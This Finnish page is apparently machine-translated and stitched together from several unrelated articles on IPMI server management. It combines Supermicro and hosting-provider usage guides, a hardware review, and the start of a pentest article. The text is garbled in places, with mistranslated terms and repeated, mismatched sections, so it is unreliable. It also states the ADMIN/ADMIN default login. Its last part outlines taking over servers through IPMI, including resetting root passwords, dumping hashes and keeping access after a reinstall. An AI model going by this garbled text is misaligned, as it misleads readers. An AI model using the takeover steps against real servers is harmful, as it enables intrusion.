Ipmi-yhteys paikallisesta tietokoneverkosta. Quantor on järjestelmäintegraattori. Ohjeet web-käyttöliittymän käyttämiseen IPMI-laiteohjelmiston vanhemmissa versioissa

Hei kaikille, tänään kerron teille, mikä IPMI-hallintaportti on, kuinka järjestelmäsuunnittelija voi käyttää sitä työssään päivittäin yksinkertaistaen elämäänsä häpeällisesti.

IPMI ( Älykäs alustan hallintaliittymä) on käyttöliittymä palvelimen fyysisen tilan etävalvontaan ja -hallintaan. IPMI on tunnetun IP-KVM-kehityksen, iLo, analogi.

IPMI-ominaisuudet

  • palvelimen etäaktivointi, sammutus ja uudelleenkäynnistys;
  • lämpötilan, jännitteen ja jäähdytysjärjestelmän valvonta;
  • etäyhteys tallennusmediapalvelimelle (esimerkiksi käyttöjärjestelmän ja ohjelmiston asentamiseen);
  • käyttäjätilien ja oikeuksien hallinta (tukea LDAP:lle ja);
  • pääsyporttien hallinta ja suojaus SSL- todistus;
  • palvelimen toimintaa koskevien ilmoitusten asettaminen.

Miten BMC-ohjain toimii?

Katsotaanpa BMC-ohjaimen toimintakaaviota. Ja niin Baseboard Management Controller on käyttöliittymä kaukosäädin ja palvelimen kunnon seuranta. Pohjimmiltaan Baseboard Management Controller on yksisiruinen järjestelmä, kuten sitä oikein kutsutaan System-on-a-Chip, SoC. BMC:ssä on sisäänrakennettu grafiikkaydin, joka käyttää palvelinlaitteiston emolevyn pääkomponentteja ja on vuorovaikutuksessa niiden kanssa erilaisten IPMI-standardin toimintaan tarvittavien rajapintojen kautta. IPMI:n hyvä puoli on, että se ei riipu isäntäpalvelimen käyttöjärjestelmästä. Henkilökohtaisesti käytän IPMI:tä palvelimien BIOSin flash-päivitykseen ja palvelimen käyttöjärjestelmän asentamiseen.


IPMI voi toimia myös NAT:n takana esimerkiksi datakeskuksissa, ihmisille annetaan mahdollisuus hallita palvelintaan tällä tavalla, hyödyllistä, jos se jäätyy. NAT:ia varten sinun on avattava seuraavat portit:

  • TCP 80: HTTP
  • TCP 443: HTTPS
  • TCP 5900, 5901: graafinen konsoli
  • TCP 5120, 5123 - Virtuaalimedialiikenne
  • UDP 623:IPMI

Miltä IPMI-portti näyttää palvelimissa?

Annan sinulle esimerkin siitä, miten fyysinen palvelin SuperMicro näyttää tältä ohjausportilta. Olen korostanut sen nuolella; useimmiten se sijaitsee yläpuolella USB-portit.

Seuraavaksi sinun on määritettävä kaikki, kuinka määrittää IPMI Supermicro-palvelimille BIOSissa tai ipmicfg-apuohjelman kautta, kerroin jo sinulle, en lopeta tähän.

IPMI:n oletussalasana

IPMI:n vakiokirjautumistunnus ja salasana ovat ADMIN / ADMIN, isoilla kirjaimilla.

Näet sivun, jossa on yhteenveto tiedot järjestelmästä, jonka näet kuvassa, se antaa sinulle yleiskatsauksen järjestelmästä, IP-osoitteen, laiteohjelmiston versionumeron, BIOS-version sekä esikatselun etäkonsolista. Voit käynnistää palvelimen heti, jos se ei toimi. Käytin IPMI-liitäntää monta kertaa käynnistääkseni palvelimen sen jälkeen, kun se oli sammutettu vahingossa.

Laitteiston tietonäytössä voit tarkastella erilaisia ​​laitteistokomponentteja ja nähdäksesi tekniset tiedot jne.

Määritykset-osion avulla voit suorittaa erilaisia ​​tehtäviä, kuten hälytyksiä, RADIUS-todennusta, verkkomäärittelyä (itse IPMI:lle), SMTP-määrityksiä hälytyksiä varten, IP-käytön hallintaa, syslogeja jne.

Kaukosäädinosio on yksi mielenkiintoisimmista asioista, koska olet todennäköisesti kiinnostunut etäkäytöstä palvelimeen, jos käytät ensisijaisesti IPMI:tä.

Luvussa kaukosäädin(Remote Control), virranhallintavalikon avulla voit:

  • suorita nollaus
  • välitön virta pois päältä
  • asteittainen sammutus
  • Virran kytkeminen päälle tai pois, kaikki on erittäin kätevää, jos yrität suorittaa vianetsintää etäyhteyden kautta tai sammuttaa palvelimen.

Launch SOL -valikon avulla voit käynnistää SOL-konsolin.

Virtuaalinen media on myös hämmästyttävä ominaisuus. Voit liittää virtuaalimedian Windows-jaon kautta ja esittää sen ikään kuin se olisi kytketty suoraan palvelimeen. IPMI:n ainoa haittapuoli on sen 4,7 Gt:n rajoitus, joka ei välttämättä riitä joillekin uusille palvelinkäyttöjärjestelmille. VL kopio Windows Server 2012 R2 painaa 5,1 Gt, mutta tämä näyttää ratkeavan päivittämällä laiteohjelmisto.

Käynnistääksesi kaukosäädinkonsolin IPMI:ssä (Remote Console), napsauta esikatselukuvaa, sinun tulee ladata java-tiedosto. Selain voi valittaa siitä, napsauta "Säilytä" vahvistaaksesi latauksen.

Johdanto

Useimmat Firstdedic-palvelimet on varustettu IPMI-moduulilla, mutta monet käyttäjät eivät kiinnitä huomiota tähän vaihtoehtoon.

IPMI on lyhenne sanoista Intelligent Platform Management Interface ja joka on käännetty venäjäksi "älykäs alustan hallintaliittymä".

Mitä se edustaa Tämä laite. Tämä on moduuli, joka sijaitsee suoraan palvelimen sisällä, ja ylimääräinen Ethernet-liitin on käytettävissä ulkopuolella.

Jos palvelimen hallinta menetetään, on mahdollista mennä määritettyyn osoitteeseen ja kirjautumisen jälkeen suorittaa toimia ongelmien ratkaisemiseksi tai tiedon saamiseksi ilmenneestä ongelmasta.

Pohjimmiltaan tätä moduulia käytetään seuraamaan ja ohjaamaan joitain palvelinlaitteistoon sisältyviä toimintoja, kuten lämpötila-anturien, jänniteanturien, virtalähteen tilan, tuulettimen nopeuden, kirjaamisen, asennuskuvien jne. valvontaa. Huomaa, että nämä ominaisuudet ovat käytettävissä prosessorista, käyttöjärjestelmästä tai BIOSista riippumatta. Hallinta on käytettävissä, vaikka palvelin olisi pois päältä.

Valitettavasti IPMI-pääsyn tarjoamisen automatisointi Tämä hetki epäonnistui, joten käyttöoikeus voidaan saada pyytämällä teknistä tukea.

Pyynnöstä toimitetaan IP-osoite, jossa käyttöliittymä sijaitsee, sekä valtuutustiedot. Käyttöoikeus ei ole täysi, rajoitettu operaattoritason tiliin.

IPMI:tä voi käyttää joko selaimella tai IPMIView-sovelluksella. Ensimmäisessä tapauksessa tarvitset esiasennetun Javan ja selainlaajennuksen, toisessa - Windowsin tai MacOS:n tai esiasennetun Javan IPMI Viewin monikäyttöistä versiota varten.

Pääsy selaimen kautta

Valtuutuksen jälkeen avautuu pääsivu, jolla pääset käyttämään IP-KVM:ää (eräänlainen virtuaalinen näyttö, joka välittää videokuvan palvelimelta yhdistetylle asiakkaalle. Siitä voi olla hyötyä, jos verkon asennuksessa, asennuksessa tapahtuu virhe. käyttöjärjestelmässä tai kun estetään IP-osoitteita konesalin tasolla), sekä nähdä palvelimen nykyinen tila, käynnistää, sammuttaa ja laitteisto käynnistää palvelin uudelleen (Virta päälle-, Power Down- ja Reset-painikkeet vastaavasti Tehonohjaus IPMI-alueen kautta).

"Päivitä esikatselukuva" -painikkeen napsauttaminen päivittää virtuaalisen näytön esikatselun. Ja kun napsautat itse mustaa näyttöä, IP-KVM JAVA -asiakasohjelma avautuu ja pääset suoraan käyttöjärjestelmäsi käyttöliittymään näppäimistön ja hiiren avulla. Mutta jotta se toimisi, tarvitset JAVA:n ja selaimen laajennuksen

Päävalikon Palvelimen kunto -välilehdellä voit tarkastella palvelimen tilaa, saada tietoa tuulettimen nopeudesta, lämpötilasta ja jännitteestä

Pääsy työpöytäsovelluksen kautta

Selainversion lisäksi on myös työpöytäversio - IPMI View, joka on olemassa Windows-, MacOS- ja Java-versioina. Jälkimmäinen on monikäyttöinen.

Kaikki IPMI Viewin uusimmat versiot sekä dokumentaatio ovat saatavilla valmistajan viralliselta ftp-palvelimelta - ftp://ftp.supermicro.com/utility/IPMIView/.

Toisin kuin selainversio, joka ladataan ja käynnistetään vasta käytön jälkeen, IPMI View asennetaan PC:lle ja kun se toimii, se yksinkertaisesti muodostaa yhteyden vaadittuun palvelimeen.

Aluksi sinun on lisättävä kaikki palvelimesi sovellusasetuksiin käyttämällä Lisää uusi järjestelmä -painiketta (Tiedosto → Uusi → Järjestelmä).

Missä IPMI-osoitekentässä: sinun on lisättävä IP, jonka sait pyytäessäsi pääsyä IPMI:hen tekniseltä tuelta.

Yhdistääksesi IPMI-liitäntään, kun olet lisännyt sen IPMI-alueeseen, kaksoisnapsauta tallennettua järjestelmää.

Kun olet napsauttanut "Kirjaudu" -painiketta ja onnistunut valtuutuksen, alustan hallintaliittymän kirjautumisikkuna muuttuu hieman: Tiedot käytetystä IPMI-versiosta tulevat näkyviin ja välilehden alareunaan, jossa on käytettävissä olevat toiminnot.

Kun siirryt joihinkin välilehtiin, huomaat, kuinka sovellus pyytää tietoja IPMI:stä ja näyttää ne helpommin saatavilla olevassa muodossa.

Esimerkiksi Anturit-välilehti näyttää tiedot graafisessa muodossa, mikä on hieman visuaalisempaa kuin vain numeroita, kuten selainversiossa.

IPM Device (IPM-laite) -välilehti tarjoaa pääsyn tietojen hankkimiseen palvelimen tilasta ja sen hallinnasta: sammuttaminen, käynnistäminen, uudelleenkäynnistys ja nollaus (vastaavasti Power Down, Power Up, Power Cycle, Reset).

Sulje nykyinen istunto ja katkaise IPMI-yhteys valitsemalla valikosta Session → Close .

Kaikki tarjoamamme palvelimet on varustettu IPMI (Intelligent Platform Management Interface) -ohjaimella, jonka avulla voit ottaa käyttöön, poistaa käytöstä etäyhteyden (KVM), jolla on mahdollisuus liittää ISO-kuvia, ja tarjoaa myös pääsyn tietoihin nykyisestä tilasta. palvelimelta.

IPMI:n avulla voit asentaa käyttöjärjestelmän ja sen jälkeen, kun palvelin on julkaistu alkuasennus palvelin. Koska IPMI-ohjain on kytketty erillisellä kaapelilla ja sillä on oma IP-osoite, voit aina hallita palvelinta etänä ilman suoraa fyysistä pääsyä, vaikka menetät käyttöjärjestelmän.

Kuinka asentaa käyttöjärjestelmä?

Käyttöjärjestelmän asentamiseksi sinun on muodostettava yhteys IPMI-palvelimeen jollakin sinulle sopivalla tavalla: Web-käyttöliittymän kautta tai käyttämällä IPMIView-ohjelmaa. Artikkelissa kuvataan molemmat vaihtoehdot, mutta suosittelemme toisen menetelmän käyttöä.

Web-käyttöliittymä

Jotta voit muodostaa yhteyden verkkokäyttöliittymän kautta, sinun on osoitekenttä kirjoita IPMI-osoitteesi selaimeesi ja kirjaudu sisään. Löydät osoitteen ja valtuutuksen tiedot kirjeestä, jolla on pääsy palvelimelle, tai henkilökohtaiselta tililtäsi. Seuraavaksi sinun on siirryttävä Kaukosäädin -> Konsolin uudelleenohjaus -välilehteen ja napsautettava Launch Console -painiketta.


Valitse Laite 1 -osiossa avattavasta Loogisen aseman tyyppi -luettelosta ISO-tiedosto ja määritä levyllä olevan kuvan polku Avaa kuva -painikkeella ja yhdistä sitten kuva Plug In -painikkeella.


Kun olet yhdistänyt kuvan, käynnistä palvelin uudelleen kohdassa Virranhallinta ->


Jotkin palvelimet mahdollistavat jopa kolmen laitteen yhdistämisen käyttämällä Laite 2- tai Laite 3 -välilehtiä Virtual Media -> Virtual Storage -osiossa. Tästä voi olla hyötyä, jos joudut asentamaan lisäohjaimia asennuksen aikana.

Jos aiot asentaa Windows-käyttöjärjestelmän palvelimelle, näppäinyhdistelmä Ctrl+Alt+Del voidaan välittää Makro-osiossa - Makro.

Ohjeet web-käyttöliittymän käyttämiseen IPMI-laiteohjelmiston vanhemmissa versioissa

IPMIView

Supermicro IPMIView -ohjelman käyttäminen edellyttää, että lataat sen viralliselta verkkosivustolta, jossa ilmoitetaan tietosi, tai suoraan ftp-palvelimelta: https://www.supermicro.com/wftp/utility/IPMIView/

Kun olet asentanut ja suorittanut ohjelman, sinun on lisättävä palvelimesi Tiedosto - Uusi - Järjestelmä -osioon.

Kirjoita System Name -kohtaan palvelimesi nimi ja IP-osoite-sarakkeeseen IPMI-osoite, jonka löydät kirjeestä, jolla on pääsy palvelimeen, tai henkilökohtaiselta tililtäsi. Varmista, että osoitesarakkeen rivin lopussa ei ole välilyöntejä, ja napsauta OK.

Kaksoisnapsauta vasemmalla olevassa luettelossa lisätyn palvelimen nimeä, jonka jälkeen näet valtuutusikkunan. Täytä se käyttämällä kirjeen tietoja tai henkilökohtainen tili ja napsauta Kirjaudu. Jos yhteys onnistuu, näet Connected-ilmoituksen, ja ikkunan alareunaan ilmestyy lisävälilehtiä palvelimen hallintaa varten.


Voit hallita palvelinta etänä siirtymällä KVM-konsoli-osioon ja napsauttamalla Käynnistä KVM-konsoli -painiketta.


Jatkotoimet ovat samanlaisia ​​kuin läpityöskentely

IPMIView-ohjelman avulla voit myös käynnistää palvelimesi uudelleen, ottaa sen käyttöön tai poistaa sen käytöstä IPMI-laite-välilehdellä.


Saatavilla on monia tekniikoita ja tuotteita, joiden avulla verkonvalvojat voivat maksimoida palvelimen käyttöajan. Siksi oli välttämätöntä, että johtamisstandardit ovat samat kaikille. Nykyään IPMI-standardi (rajapinta älykäs ohjaus alusta) on yksi tärkeimmistä avoimista standardeista ja se on läsnä kaikilla Supermicro-alustoilla.

Suurin osa emolevyt Supermicro sisältää erityisen paikan, joka tukee 2.0-standardin IPMI-kortteja (IPMI over LAN). IPMI-teknologia mahdollistaa palvelimen etähallinnan ja palauttamisen sen tilasta ja tilasta riippumatta. Viestintä etähallintakonsolin kanssa tapahtuu sisäänrakennetun verkko-ohjaimen avulla lisäkaistanleveyden avulla. Tämä on käyttöjärjestelmästä riippumaton laitteistoratkaisu. IPMI 2.0 on nopea ja edullinen tapa hallita, valvoa, diagnosoida ja palauttaa palvelinta etänä.

Koska IPMI on täysin riippumaton käyttöjärjestelmästä, valvonta, hallinta, diagnostiikka ja järjestelmän palautus voidaan suorittaa myös käyttöjärjestelmän ollessa jumiutunut tai palvelin offline-tilassa. IPMI-teknologia toteuttaa toimintoja, jotka näyttävät ilmoituksia komponenttien palautustarpeista – näin voidaan seurata järjestelmän tilaa ja reagoida mahdollisiin laitteistoongelmiin ennen niiden ilmenemistä. Todennäköisyys vastaavia ongelmia Myös laitteiston valvontaominaisuus vähentää tätä. Lisäksi voit valvoa palvelinlaitteiston peukalointia, jos määrität IPMI-järjestelmän havaitsemaan kotelon aukot. Henkilöstön turvallisuus varmistetaan monitasoisten oikeuksien ja salasanojen käytöllä tunnistus- ja lineaarisalaustekniikoiden yhteydessä. Jotkut IPMI 2.0 -moduulit tukevat KVM-over-Lania. Tämä mahdollistaa etäkirjautumisen palvelimella olevaan käyttöjärjestelmään ja suorittaa tarvittavat asetukset sen määrittämiseksi tai asentaa ja poistaa tarvittavat ohjelmat.

IPMI on helppokäyttöinen, koska se tulee yleensä valmiiksi integroituna palvelimeen tai erilliseen laitteeseen. Ja mikä tärkeintä, se ei vaadi taloudellisia kuluja. Ja voit hallita järjestelmää niinä hetkinä, kun ohjelmisto ovat voimattomia - esimerkiksi kun käyttöjärjestelmä jäätyy. Siten IPMI-teknologia ja olemassa olevat hallintatyökalut ja -menetelmät täydentävät toisiaan täydellisesti. Ja tehokkaan palvelimen hallinnan kannalta on välttämätöntä käyttää sekä ohjelmisto- että laitteistoresursseja. -

IPMI-tekniikan edut

  • Virtalähteiden, puhaltimien, jännitteen ja lämpötilan kaukosäädin tyypistä ja kunnosta riippumatta keskusprosessori ja käyttöjärjestelmä
  • Pidetään kirjaa ajankohtaisista tapahtumista
  • DOS-tuki BIOS-asetus, Windows 2003, Linux
  • Rungon painikkeiden ohjaus: Reset; Virta pois; Käynnistää
  • Salasanasuojaus

Altusen IP9001- ja IPMI-moduulit: sulautetut työkalut tietokoneen etähallintaan

Kaukosäädinmoduulit, joista KVM-kytkimet ovat tunnetuimpia, valmistetaan yleensä ulkoisten rakenteiden muodossa. Mutta on myös toinen laiteluokka, joka on myös suunniteltu palvelinlaitteiden etäkäsittelyyn ja joka on rakennettu suoraan ohjattuun kohteeseen. Joka Järjestelmänvalvoja ei voi kuvitella toimintaansa käyttämättä etäyhteys valvotuille palvelimille ja kahdessa versiossa: laitteiden tilan etävalvonta ja hallinnollisten toimintojen etäsuoritus. Tyypillisesti nämä tehtävät ratkaistaan ​​käyttämällä tekstikonsolia tai graafista kuorityöpöytää. On mahdollista järjestää kauko-ohjaus eri tavoilla, joista yleisimmät ovat ohjelmistotyökalut. Lähes jokainen palvelimien ja tallennusjärjestelmien valmistaja sisältää ohjelmistot tilan etävalvontaan, kriittisten tilanteiden ilmoittamiseen ja laitehallintaan.

Vähiten tärkeitä ovat käyttöjärjestelmän tarjoamat sisäänrakennetut etäkäyttötyökalut, yksittäisiä kolmannen osapuolen tuotteita lukuun ottamatta. Joskus ohjelmistotyökalut ovat kuitenkin tehottomia ongelmien vianmäärityksessä ilman suoraa pääsyä palvelimeen. Tämä tapahtuu esimerkiksi laitteistovian aikana ja vain "kylmä" uudelleenkäynnistys tai jopa tarve kytkeä virta pois/päälle voi korjata tilanteen. Tällaisissa tapauksissa apuun tulee erikoistunut laitteisto- ja ohjelmistoratkaisu, joka on emolevylle asennettu erityinen ohjain. Sen virta saadaan valmiustilalähteestä tai jopa itsenäisesti. Sitä voidaan käyttää verkkoliitännän kautta; lisäksi voi olla toinen kanava - erillisen COM-portin tai modeemin kautta. Tällaisella ohjaimella on pääsy emolevyn antureisiin, ja se voi myös suorittaa laitteiston nollauksen ja kytkeä virran päälle/ vinossa. Näitä toimintoja hallitaan järjestelmänvalvojan työasemalta, jolle on asennettu asiakas, joka on vuorovaikutuksessa ohjaimien kanssa ja mahdollistaa tällaisilla moduuleilla varustettujen palvelimien ryhmän seurannan/hallinnan.>

Altusen IP9001 IP9001-ohjain on pohjimmiltaan "tietokone tietokoneen sisällä". Tämä ratkaisu varmistaa täydellisen laitteistoriippumattomuuden hallitusta palvelimesta. Pääsy etäsolmuun tapahtuu web-rajapinnan kautta, ja sen avulla voit suorittaa kaikki toiminnot huollettavalla tietokoneella, mukaan lukien päälle/pois ja laitekäynnistys Laite on TCP/IP-protokollan kautta kauko-ohjattava PCI-ohjain, joka on suunniteltu asennettavaksi mihin tahansa tietokoneeseen, joka on varustettu asianmukaisella liitännällä. Itse asiassa IP9001 on itsenäinen tietokone, jossa on oma IBM PowerPC 405GPr -prosessori - 400 MHz:n versio jo tunnetusta 405GP:stä, joka on valmistettu kellotaajuudet 266 ja 300 MHz. Tämä prosessori sisältää integroidun PCI-liitännän, SDRAM- ja Ethernet-ohjaimet. Kortilla on tarvittavan RAM- ja ROM-muistin lisäksi oma ATI Rage XL -näytönohjain ja verkkoon liittymistä varten RJ-45 Ethernet-portti. Myös läpityöskentelymahdollisuus on huomionarvoinen puhelinverkko käyttämällä ylimääräistä modeemimoduulia (RJ-11-liitin) - se auttaa, jos hallittuun solmuun ei ole pääsyä paikallinen verkko. Edellä mainittujen lisäksi kauko-ohjainmoduuli on varustettu kunnollisilla oheisliitännöillä, mukaan lukien RS-232 ja USB-keskitin 2.0. Laite saa virtaa kahdella tavalla - läpi PCI-väylä ja ulkoinen lähde, joka on suunniteltu tarjoamaan riippumattomuutta hallittavasta tietokoneesta. Ohjaus etäkonsolista tarjoaa käyttäjälle täyden valikoiman ominaisuuksia, jotka ovat saatavilla suoraan palvelimelta, mukaan lukien työskentely etäkonsolitilassa, järjestelmän jännitteen ja lämpötilan valvonta, päälle/pois ja uudelleenkäynnistys. Tuki virtuaalinen levy, CD- ja levykeasemien avulla voit asentaa päivityksiä, ohjelmistoja ja käynnistää käyttöjärjestelmän etätyöasemalla fyysisesti sijaitsevalta tietovälineeltä. Ohjelmisto mahdollistaa 64:n tilin tuen, joissa kunkin operaattorin käyttöoikeudet on eriytetty. Laite on suunniteltu käytettäväksi operatiivisesti Windows-järjestelmät 2000/2003/XP, Red Hat -versiot 8.0 ja uudemmat. IPMI (Intelligent Platform Management Interface).

Toinen sulautettujen laitteiden tyyppi, joka on suunniteltu yksinomaan palvelinalustoille, perustuu IPMI-spesifikaatioihin, jotka Intel, HP, NEC ja Dell ovat kehittäneet etävalvonta-/hallintatyökaluja varten. Se sisälsi kolme eritelmää: Älykäs alustan hallintaliittymä; Intelligent Platform Management Bus (IPMB) ja Intelligent Chassis Management Bus (ICMB). IPMB on sisäinen rajapintamääritelmä edistyneeseen valvontaan/hallintaan yhdessä järjestelmässä. ICMB määrittelee IPMI-yhteensopivien järjestelmien väliset ulkoiset rajapinnat.

IPMI-laajentimet tarjoavat pienestä koostaan ​​huolimatta täyden hallinnan palvelimelle.Version 1.0 julkaisun jälkeen vuonna 1998 julkaistiin versio 1.5 ja 2.0-spesifikaatio on tällä hetkellä ajankohtainen. Tätä standardia on tukenut jo 171 laitevalmistajaa, ja lista kasvaa edelleen. Versio 1.5 hyväksyttiin vuoden 2001 ensimmäisellä neljänneksellä. Se sisälsi jo seuraavat ominaisuudet: välineet lämpötilojen, jännitteiden, puhallinnopeuksien valvontaan, kotelon peukalointianturit; nollaus ja virranhallinta; tapahtumien kirjaus; vahtikoirapiiri (WatchDog Timer); pääsy ja ilmoitus COM-portin ja paikallisverkon kautta; erikoisrenkaat valvontaan. Versio 2.0 otettiin käyttöön helmikuussa 2004. Se sisältää useita lisäominaisuuksia, kuten Serial Over LAN, pakettien salaus, sisäiset ja ulkoiset protokollat, parannettu suojaus luvattomalta käytöltä, lisätyt laajennukset modulaaristen rakenteiden valvontaan (blade-palvelimet) ja työkalut virtuaalisten (vain hallinta) verkkojen luomiseen. Palvelimen emolevyt Intel 7500 -alustalla Xeon Prestonialle 400 MHz väylällä varustettiin IPMI:llä. Se oli IPMI-1.5:n kanssa yhteensopiva SMC-0001-moduuli, joka on suunniteltu pieneksi kortiksi erikoisprosessorilla ja omalla COM-portilla, joka on samanlainen kuin SO-DIMM-muistimoduuleissa. Lähes kaikki Intel 7520/7525/7320 -kortit alusta, samoin kuin Intel 7221 for Pentium 4 on varustettu AOC-IPMI20-E-moduulilla, joka on jo yhteensopiva IPMI 2.0:n kanssa.

IPMI-arkkitehtuurin versio 2.0. Nykyään tämä on tärkein palvelinjärjestelmien kehittäjien hyväksymä standardi

Palvelinalustoille 7230 Pentium D ja 1U 6014P-sarjan Xeon-alustoille IPMI-korttien uusi muotoilu on ilmestynyt. Siinä on PCI-X x16:n kaltainen liitin, vain "käänteisellä" avaimella. Nämä levyt (AOC-1UIPMI-B ja AOC-LPIPMI-LANG) ovat toiminnallisesti samanlaisia ​​kuin AOC-IPMI20-E, mutta niissä on ylimääräinen Intel 82541PI Gigabit -verkkokortti. AOC-LPIPMI-LANG-moduuli on suunniteltu asennettavaksi tavalliseen tai 2U-koteloon, ja AOC-1UIPMI-B on suunniteltu asennettavaksi 1U-koteloon, eikä siinä ole verkkokorttia (saatavana lisävarusteena erillisenä AOC:na -1UIPMI-LANG-moduuli). Oletusarvoisesti AOC-IPMI20-E käyttää ensimmäistä emolevyn verkko-ohjainta, ja AOC-1UIPMI-B ja AOC-LPIPMI-LANG käyttävät lisäohjainta, jos ne on asennettu. Kun se on asennettu IPMI-moduuliin, emolevyä vastaava laiteohjelmisto ohjelmoidaan ensin ja sitten asetetaan IP-osoite. Käyttöjärjestelmässä sama LAN-kortti voidaan käyttää rinnakkain muihin tarpeisiin eri IP-osoitteella kuin IPMI:lle asetettu. Pääsääntöisesti turvallisuussyistä on suositeltavaa varata erillinen verkko jälkimmäiselle. IPMI-sovittimilla varustettujen järjestelmien valvontaan/hallintaan käytetään erityistä IPMIView20-apuohjelmaa, joka tunnistaa kaikkien versioiden sovittimet. Sen avulla voit löytää IPMI-sovittimet tietyltä osoitealueelta ja ryhmitellä havaitut järjestelmät tietyn kriteerin mukaan. Tietylle palvelimelle pääsy edellyttää salasanatodennusta, ja IPMI 2.0 käyttää salasanan hallintaa ja salausta sekä käyttöoikeuksien monitasoista eriyttämistä. Ohjelmisto palvelimien hallintaan IPMI:n kautta tarjoaa operaattorille paitsi sarjan perustoiminnoista, mutta myös tarkkailutiedot kätevässä graafisessa muodossa IPMI-sovittimien tarjoamat tärkeimmät valvonta-/ohjausominaisuudet, standardit: järjestelmätapahtumien kirjaaminen, lämpötilojen, jännitteiden, puhallinnopeuksien ja muiden antureiden seuranta. On mahdollista käynnistää uudelleen, kytkeä päälle/pois ja Cycle - peräkkäin sammuttamalla ja sitten kytkemällä virta. Kaikki nämä toiminnot ovat käytettävissä kahdessa tilassa: Graceful Power Control - käyttöjärjestelmän oikea sammutus siihen asennetun agentin kautta (GPC-agentti on saatavilla vain Windowsille ja Linuxille) ja Chassis Power Control - laitteiston nollaus/virrankatkaisu. tekstikonsoliin saadaan määrittämällä se uudelleen COM-porttiin ja toteuttamalla SOL-uudelleenohjaus (Serial Over LAN). Jälkimmäisen avulla voit käyttää tekstikonsolia etäpalvelin ja vaihtaa etänä esim. BIOS-asetukset. Samalla tavalla voit käyttää käynnistyslatainta Windows-valikko tai Linux/UNIX-tekstikonsoliin.

Jälkisana

Katsauksessa kuvatut laitteet on suunniteltu suorittamaan sama tehtävä - yksinkertaistamaan etäjärjestelmien ylläpitoa mahdollisimman paljon. Suurin ero niiden välillä on soveltamisala. Vaikka Altusen IP9001 sopii kaikkiin järjestelmiin, IPMI-moduulien asennus on rajoitettu yksinomaan palvelinalustoille. Nykyään monet kehitysyritykset pyrkivät sisällyttämään tällaiset moduulit osaksi järjestelmiään. Joten 15. kesäkuuta ATEN International Co. Oy ilmoitti, että Micro-Star International Co. on virallisesti valinnut sen uuden IPMI-laiteohjelmistoratkaisun. Oy (MSI) palvelintuotelinjaansa varten. MSI integroi ATEN-laiteohjelmistoratkaisun AMD-palvelimiinsa tarjotakseen asiakkaille tarvittavat palvelimen hallintatoiminnot.Erikseen on syytä huomata, että Supermicro valmistelee uusia AOC-SIMLP IPMI 2.0 -seuranta/hallintatyökaluja Bensley-alustalle, joka Niissä on sisäänrakennetut KVM Over LAN -ominaisuudet IPMI:n kautta.

Suurimmalla osalla nykyaikaisista palvelimista on IPMI/BMC-liitäntä palvelimen etähallintaa varten. Tämä työkalu edustaa pääsyä virtuaalinen näppäimistö ja palvelinnäyttö TCP/IP-protokollan kautta. Tänään käsittelemme IPMI-tietoturvatutkimuksen historiaa, tarkastelemme vektoreita hyökkäysten toteuttamiseen ja niiden jatkokehitystä IPMI:n avulla.

IPMI on joukko määritelmiä, jotka säätelevät, kuinka viestiä ja mitä tarjotaan.
Kaikki toimittajat yrittävät noudattaa näitä eritelmiä.
Laivasto on IPMI-toiminnan laitteistokääre. Se on yksilevyinen tietokone (järjestelmä sirulla), jonka pääantureissa on lonkerot. Jokainen myyjä valitsee, millaista laitteistoa käyttää ja miten se yhdistetään, mikä on luonnollista. Harkitsemme kaikkia esimerkkejämme käyttämällä Hewlett-Packardin (HP) integroitua Lights Outia (iLO). HP iLO on vain BMC/IPMI-yhdistelmä. Muilla toimittajilla on omat nimensä, toteutukset laitteistoissa ja ohjelmistoissa. Mutta yleensä tämä on yksi lautatietokone ARM prosessori ja Linux mukana.
Tällaisten laitteiden päätehtävä on tehdä järjestelmänvalvojien elämästä yksinkertaisempaa ja mukavampaa: sinun ei tarvitse juosta palvelimelle ja painaa Reset-painiketta uusi järjestelmä/ Katso miksi se ei lataudu. Nyt voit muodostaa yhteyden IPMl/BMC:hen ja tehdä kaiken tämän etänä. Lisäksi on mahdollista vastaanottaa tietoa erilaisista lämpötila-antureista,
jännite ja niin edelleen, mikä on myös varsin kätevää.


HALLINTA

Ohjausrajapintoja on useita:
- verkkokäyttöliittymä (riippuen toimittajasta);
- IPMI LAN:n kautta (UDP 623);
- alkaen asennettu järjestelmä palvelimella (edellyttäen, että valmistajan ohjaimet on asennettu). Käytetty ohjelmisto: WMI Windowsille, OpenlPMI, IPMltool Linuxille.

Verkkokäyttöliittymässä kaikki on selvää. Jokainen myyjä päättää itse, miltä se näyttää ja miten se toteutetaan. Toinen ja kolmas rajapinta ovat samanlaiset, mutta lähetysväline on erilainen. IPMI over LAN, kuten saatat arvata, komennot lähetetään verkon kautta UDP-porttiin 623. Asennetusta järjestelmästä IPMI-komennot lähetetään laitetiedoston kautta, yleensä /dev/ipm iO, joka tulee näkyviin asennuksen jälkeen. kuski. Standardi apuohjelma vuorovaikutukseen IPMI:n kanssa on IPMltool GNU/Linuxille, koska se on helpoin käyttää.

MITÄ PENTESTER IPMl/BMC

Huolimatta siitä, että raportti IPMl/BMC-haavoittuvuuksista julkaistiin kesällä 2013, haavoittuvia järjestelmiä on tällä hetkellä jäljellä. Hyvin usein minkä tahansa raidan IPMl/BMC löytyy hakukoneen kautta. Tällaisia ​​järjestelmiä ei tietenkään pidä pitää ulkona. Niitä kohdataan pääasiassa sisäisten pentestien aikana. Yksi yksinkertaisimmista tällaisia ​​järjestelmiä käyttävistä hyökkäysvektoreista on palvelimen "kaappaus" IPMI/BMC:n avulla.

Kun sinulla on järjestelmänvalvojan käyttöoikeudet IPMl/BMC:hen (kuten alla näytetään, tämä ei ole ollenkaan vaikeaa), voit muodostaa yhteyden VirtualConsolen (alias KVM) kautta ja esimerkiksi nollata pääkäyttäjän salasanan tai käyttää LiveCD:tä tiivisteen tyhjentämiseen ja paikalliset käyttäjät jos se on Windows. Ylivoimaisella onnentaidolla voit saada jopa konsolin, josta root unohti kirjautua ulos (tätä tapahtuu hyvin usein virtuaalikoneita). IPMI:tä puolestaan ​​voidaan käyttää myös mahdollisuutena saada takaisin pääsy palvelimeen järjestelmän täydellisen uudelleenasennuksen jälkeen.
